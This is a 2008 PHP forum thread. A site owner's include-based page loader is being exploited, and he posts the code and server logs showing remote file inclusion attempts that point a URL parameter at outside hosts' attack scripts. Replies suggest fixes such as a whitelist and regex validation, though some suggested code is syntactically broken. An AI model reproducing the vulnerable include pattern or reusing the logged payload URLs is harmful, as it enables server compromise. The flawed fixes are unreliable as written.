drfate Posted November 13, 2008 Share Posted November 13, 2008 Hi Everyone, I've got the following code in in a PHP which opens up a .HTM <?php if (isset($_GET["page"])){ $thepage = $_GET["page"]; $thetype = $_GET["type"]; include $thepage.'.'.$thetype; } ?> The problem is, this code is being exploited (see below for example). Does anyone know how to stop this? 189.81.16.230 - - [12/Nov/2008:15:00:13 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)" 74.6.22.180 - - [12/Nov/2008:16:09:09 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsanimatedadventuresewoks&type=htm HTTP/1.0" 200 3972 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 70.38.54.118 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsclonewars&type=htm/display.php?pg=http://masla.su/apache/idxx.txt?? HTTP/1.1" 200 15209 "-" "Mozilla/5.0" 70.38.54.118 - - [12/Nov/2008:23:58:35 -0500] "GET /dvdgeneraldisplay.php?page=dvd/display.php?pg=http://masla.su/apache/idxx.txt?? HTTP/1.1" 200 15266 "-" "Mozilla/5.0" 124.0.208.252 - - [13/Nov/2008:00:41:19 -0500] "GET /dvdgeneraldisplay.php?page=dvd/display.php?pg=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 15272 "-" "Mozilla/5.0" 124.0.208.252 - - [13/Nov/2008:00:41:19 -0500] "GET /dvdgeneraldisplay.php?page=dvd/dvdstarwarsclonewars&type=htm/display.php?pg=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 200 15104 "-" "Mozilla/5.0" 189.81.16.230 - - [13/Nov/2008:05:38:55 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)" 189.81.16.230 - - [13/Nov/2008:06:14:07 -0500] "GET /favicon.ico HTTP/1.1" 404 - "http://www.mydomain.com/dvdgeneraldisplay.php?page=http://www.pacote270178.xpg.com.br/teste2.txt?" "Opera/9.52 (Windows NT 5.1; U; pt-BR)" cheers, Andrew Quote Link to comment https://forums.phpfreaks.com/topic/132631-php-code-security-exploit-php-injuction-how-do-i-fix-this/ Share on other sites More sharing options...
KevinM1 Posted November 13, 2008 Share Posted November 13, 2008 1. This has nothing to do with object oriented programming (OOP). 2. Code tags are your friends. 3. Your problem stems from not securing your incoming query strings. At all. A simple way to fix your problem is to create a whitelist of possible page values that actually represent the pages of your site, assuming your site is small (say fewer than 20 pages). Then you can compare the incoming value with your list of legit pages. $allowedPages = array("home", "news", "contact", "faqs"); //example values...replace with your actual page names $page = strtolower($_GET['page']); //make sure the incoming value is all lowercase if(!in_array($page, $allowedPages)) { echo "I don't think so...."; } else { include $page . '.' . $type; } Quote Link to comment https://forums.phpfreaks.com/topic/132631-php-code-security-exploit-php-injuction-how-do-i-fix-this/#findComment-689697 Share on other sites More sharing options...
Mchl Posted November 13, 2008 Share Posted November 13, 2008 Don't include when $_GET['page'] contains "http://" seems like the quickest (but not necessarily the best) solution. Quote Link to comment https://forums.phpfreaks.com/topic/132631-php-code-security-exploit-php-injuction-how-do-i-fix-this/#findComment-689705 Share on other sites More sharing options...
drfate Posted November 13, 2008 Author Share Posted November 13, 2008 Mchl wrote: Don't include when $_GET['page'] contains "http://" seems like the quickest (but not necessarily the best) solution. How do I fix this? Quote Link to comment https://forums.phpfreaks.com/topic/132631-php-code-security-exploit-php-injuction-how-do-i-fix-this/#findComment-689745 Share on other sites More sharing options...
drfate Posted November 13, 2008 Author Share Posted November 13, 2008 1. This has nothing to do with object oriented programming (OOP). 2. Code tags are your friends. 3. Your problem stems from not securing your incoming query strings. At all. A simple way to fix your problem is to create a whitelist of possible page values that actually represent the pages of your site, assuming your site is small (say fewer than 20 pages). Then you can compare the incoming value with your list of legit pages. $allowedPages = array("home", "news", "contact", "faqs"); //example values...replace with your actual page names $page = strtolower($_GET['page']); //make sure the incoming value is all lowercase if(!in_array($page, $allowedPages)) { echo "I don't think so...."; } else { include $page . '.' . $type; } Hi Nightslyr, unfortuantely my site has quite few pages, any other ideas? Quote Link to comment https://forums.phpfreaks.com/topic/132631-php-code-security-exploit-php-injuction-how-do-i-fix-this/#findComment-689773 Share on other sites More sharing options...
corbin Posted November 13, 2008 Share Posted November 13, 2008 http://www.pacote270178.xpg.com.br/teste2.txt lol..... It looks like who ever exploited your site is using your server to mass email. Depending on how many people he's spamming, you get get some fun messages soon ;p. First off, don't let people pass in the extension. There's no reason to. I would use just PHP pages. Second, restrict it some how. A good way to do it if all of the files are in the same folder (and nothing unsafe is in said folder) is to do the following: $page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default'; if(preg_match('^[a-zA-Z0-9_ -]+$', $page) && file_exists('some/folder/' . $page . '.php)) { require 'some/folder/' . $page . '.php'; } else { echo "Page not found!"; } Quote Link to comment https://forums.phpfreaks.com/topic/132631-php-code-security-exploit-php-injuction-how-do-i-fix-this/#findComment-689777 Share on other sites More sharing options...
drfate Posted November 14, 2008 Author Share Posted November 14, 2008 http://www.pacote270178.xpg.com.br/teste2.txt lol..... It looks like who ever exploited your site is using your server to mass email. Depending on how many people he's spamming, you get get some fun messages soon ;p. First off, don't let people pass in the extension. There's no reason to. I would use just PHP pages. Second, restrict it some how. A good way to do it if all of the files are in the same folder (and nothing unsafe is in said folder) is to do the following: $page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default'; if(preg_match('^[a-zA-Z0-9_ -]+$', $page) && file_exists('some/folder/' . $page . '.php)) { require 'some/folder/' . $page . '.php'; } else { echo "Page not found!"; } Hi Corbin, thanks for your help. Just a quick question, I have a .htaccess file which displays the following: RewriteRule ^dvd(.*).html$ dvdgeneraldisplay.php?page=dvd/dvd$1&type=htm [L,NC] and I put the following code in: <?php $page = (isset($_GET['page'])) ? trim($_GET['page']) : 'default'; if(preg_match('^[a-zA-Z0-9_ -]+$', $page) && file_exists('dvd/' . $page . '.php)) { require 'dvd/' . $page . '.php; } else { echo "Page not found!"; } ? Then I get the error: Parse error: syntax error, unexpected T_STRING in /home2/impulse/public_html/dvdgeneraldisplay.php on line 111 What am I missing? Quote Link to comment https://forums.phpfreaks.com/topic/132631-php-code-security-exploit-php-injuction-how-do-i-fix-this/#findComment-690054 Share on other sites More sharing options...
Daniel0 Posted November 16, 2008 Share Posted November 16, 2008 http://www.phpfreaks.com/tutorial/preventing-remote-file-include-attacks-with-mod-rewrite Quote Link to comment https://forums.phpfreaks.com/topic/132631-php-code-security-exploit-php-injuction-how-do-i-fix-this/#findComment-691387 Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.